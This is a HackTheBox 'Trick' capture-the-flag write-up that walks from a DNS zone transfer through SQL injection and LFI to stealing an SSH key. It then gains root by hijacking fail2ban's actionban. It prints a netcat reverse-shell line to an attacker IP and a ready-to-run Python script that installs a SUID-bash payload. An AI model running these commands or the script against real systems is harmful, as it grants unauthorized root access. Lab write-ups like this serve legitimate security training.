HackTheBox — Trick

ARZ101
6 min read · Oct 29, 2022

Trick is an easy Linux machine. A DNS zone transfer reveals a payroll management system whose login form is vulnerable to SQL injection, which lets us log in. The same injection can read local files, so we pull the nginx vhost file and find another subdomain. That site has an LFI of its own and runs as the user michael, so we read his private SSH key and get a shell. michael can restart fail2ban via sudo and has write access to its action.d directory, so editing a fail2ban action to run a reverse shell (or any other command) gets it executed as root.

NMAP

Nmap scan report for 10.129.85.201
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the web page we see a Bootstrap template with nothing interesting.

Fuzzing for files and directories didn't find anything either.

PORT 53 (DNS)

With a DNS server running we can try to query records or perform a zone transfer. For that we need a domain name, which we can get with a reverse DNS lookup (resolving the IP back to a name) against the target's own name server:

https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

dig -x 10.10.11.166 @10.10.11.166

This returns trick.htb, which we add to our hosts file.

To enumerate further we can perform a DNS zone transfer.

The first query only shows root.trick.htb, which doesn't take us anywhere (in a SOA record that name is the zone's responsible mailbox, not a host). Performing the zone transfer with AXFR:

We get another name, preprod-payroll.trick.htb, so let's add it to the hosts file as well.
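The zone-transfer step as an added example (not the write-up's own code): a small parser that turns a dig axfr dump into the /etc/hosts line to add. The AXFR text below is constructed for this example and patterned on the names found above; the domain, IP and dig command are the ones used in the write-up.

```python
"""Zone transfer -> hosts-file entries (added example, not from the write-up)."""
import re
import subprocess
from typing import List

# Constructed dig output for this example.  Note the A record points at
# 127.0.0.1: a zone's own view of its hosts is often loopback or internal,
# which is why we map the names to the IP we scanned, not to what the zone says.
SAMPLE_AXFR = """\
;; constructed dig axfr output, comment lines start with ';'
trick.htb.\t604800\tIN\tSOA\ttrick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.\t604800\tIN\tNS\ttrick.htb.
trick.htb.\t604800\tIN\tA\t127.0.0.1
trick.htb.\t604800\tIN\tAAAA\t::1
preprod-payroll.trick.htb.\t604800\tIN\tCNAME\ttrick.htb.
trick.htb.\t604800\tIN\tSOA\ttrick.htb. root.trick.htb. 5 604800 86400 2419200 604800
"""

# owner-name  ttl  IN  type  rdata   (SOA/NS/TXT lines are deliberately skipped)
_RR = re.compile(r"^(\S+)\.\s+\d+\s+IN\s+(?:A|AAAA|CNAME)\s+\S+$")


def zone_transfer(domain: str, server: str) -> str:
    """Ask the target's own name server for the whole zone (what `dig axfr` does)."""
    return subprocess.run(["dig", "axfr", domain, f"@{server}"],
                          capture_output=True, text=True, check=True).stdout


def hostnames_from_axfr(output: str) -> List[str]:
    """Owner names of A/AAAA/CNAME records, in first-seen order, deduplicated."""
    names: List[str] = []
    for line in output.splitlines():
        m = _RR.match(line.strip())
        if m and m.group(1) not in names:
            names.append(m.group(1))
    return names


def hosts_line(ip: str, names: List[str]) -> str:
    """The line to append to /etc/hosts so every vhost resolves to the box."""
    return f"{ip} {' '.join(names)}"


if __name__ == "__main__":
    # Live: names = hostnames_from_axfr(zone_transfer("trick.htb", "10.10.11.166"))
    print(hosts_line("10.10.11.166", hostnames_from_axfr(SAMPLE_AXFR)))
```

The parser keeps CNAME owners as well as A records because a vhost that is only a CNAME still needs a hosts entry for the web server to see the right Host header.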

Visiting this subdomain gives us a login page, where we can try default credentials.

Those didn't work, so next I tried SQL injection.

That worked. I then tried running sqlmap, but the injection here is time-based blind, so dumping the database would take a long time.

Foothold

Going back to the site we can see a GET parameter page that fetches pages. I tried LFI on that parameter but it didn't work.

I tried running wfuzz against the parameter with an LFI wordlist.

That didn't work either, but the web app has SQL injection in a ton of places. Intercepting the request made when viewing employee details, we get a GET parameter id that is also vulnerable to SQLi.

This one is boolean-based blind (the login page was time-based), which is far faster to exploit: each request leaks one bit instead of costing a sleep. With it we can read local files through the database (for example with sqlmap's --file-read, which on MySQL uses LOAD_FILE() and needs the FILE privilege plus a path allowed by secure_file_priv) and fetch the nginx vhost configuration.

This reveals another subdomain, preprod-marketing.trick.htb.

Alternatively we could have found this subdomain by vhost fuzzing with wfuzz.

This loads another site with nothing special apart from the same GET parameter, so I ran the LFI wordlist here as well.

This time we get some output: filtering out the baseline response, a few payloads come back different, and we have LFI.

From the files we can now read we have the username michael; we can try his .ssh folder for id_rsa.

Privilege Escalation

Running sudo -l to check what we can run with sudo privileges:

We can restart the fail2ban service, but we don't yet know what to edit. Being in the security group, we can check what that group has permissions on.

We have write access to this folder, which holds fail2ban's action configuration files.

I found an article explaining how to abuse fail2ban's config files.

For this we need to change the actionban command in iptables-multiport.conf. We can write to the directory but not to the file itself, so first copy the file to /tmp (or anywhere else we can edit it) and replace actionban with a reverse shell:

/usr/bin/nc 10.10.14.39 2222 -e /bin/bash

After editing the copy, move it back into action.d and restart the fail2ban service with sudo.

Then make failed login attempts, and you get a reverse shell on your port.

But the connection dies shortly after. The ban only lasts 10 seconds (bantime) and is triggered after the 5th failed attempt (maxretry), and the shell does not survive past the ban.

Instead of a reverse shell we can make bash SUID with chmod +s /bin/bash, which stays in place after the ban expires; then /bin/bash -p gives a root shell (-p stops bash from dropping the effective UID).

Performing the invalid login attempts against SSH triggers fail2ban on the 5th invalid attempt, and the patched actionban runs as root.
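The whole privilege-escalation procedure as an added example (not the write-up's own code): patch actionban in a copy of iptables-multiport.conf, swap the copy into action.d, restart fail2ban, and wait for a ban. The config excerpt is constructed from the [Definition] section of that file; the sudo restart command and the SSH-trigger loop are assumptions, so use whatever sudo -l listed and whichever jail is active.

```python
"""
fail2ban actionban hijack (added example, not the write-up's own code).

The finding was group write on /etc/fail2ban/action.d, not on the file, so
we never open the original for writing: copy out, patch the copy, unlink the
original (a directory permission), move the copy in.  Whatever actionban says
is run by the fail2ban daemon, i.e. as root, the next time a jail bans an IP.
"""
import os
import re
import shutil
import subprocess
import sys

ACTION = "/etc/fail2ban/action.d/iptables-multiport.conf"
SCRATCH = "/tmp/iptables-multiport.conf"
PAYLOAD = "chmod +s /bin/bash"   # survives the 10 s bantime, unlike a reverse shell
# ASSUMPTION: the restart command `sudo -l` permits; adjust to what the box shows.
RESTART = ["sudo", "/etc/init.d/fail2ban", "restart"]

# Constructed excerpt of the [Definition] section of iptables-multiport.conf.
SAMPLE_CONF = """\
[Definition]
actionstart = <iptables> -N f2b-<name>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
"""

_ACTIONBAN = re.compile(r"^actionban\s*=.*$", re.MULTILINE)


def patch_actionban(text: str, cmd: str) -> str:
    """Replace every `actionban = ...` line with `cmd`; other actions are untouched.
    Refuses to return an unchanged file so we never reinstall a no-op."""
    new, n = _ACTIONBAN.subn(lambda _m: f"actionban = {cmd}", text)
    if n == 0:
        raise ValueError("no actionban line in config")
    return new


def exploit() -> None:
    shutil.copy(ACTION, SCRATCH)                 # reading the original is allowed
    with open(SCRATCH) as f:
        patched = patch_actionban(f.read(), PAYLOAD)
    with open(SCRATCH, "w") as f:
        f.write(patched)
    os.remove(ACTION)              # needs write on action.d only; without this,
    shutil.move(SCRATCH, ACTION)   # a cross-filesystem move would try to open the root-owned file
    subprocess.run(RESTART, check=True)   # make fail2ban load the patched action
    # Now trip the jail from the attacker box (ASSUMPTION: sshd jail, maxretry 5),
    # e.g. six wrong-password logins within findtime:
    #   for i in $(seq 6); do sshpass -p x ssh -o StrictHostKeyChecking=no x@10.10.11.166; done
    # then on the box:  /bin/bash -p   (-p keeps the SUID effective uid)


if __name__ == "__main__":
    if "--run" in sys.argv:
        exploit()
    else:
        print(patch_actionban(SAMPLE_CONF, PAYLOAD))
```

Run without arguments it only prints the patched config, which is worth eyeballing before the real run: actionunban must stay intact, otherwise the daemon logs errors on every unban and the jail may be disabled by an admin before you get your ban.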
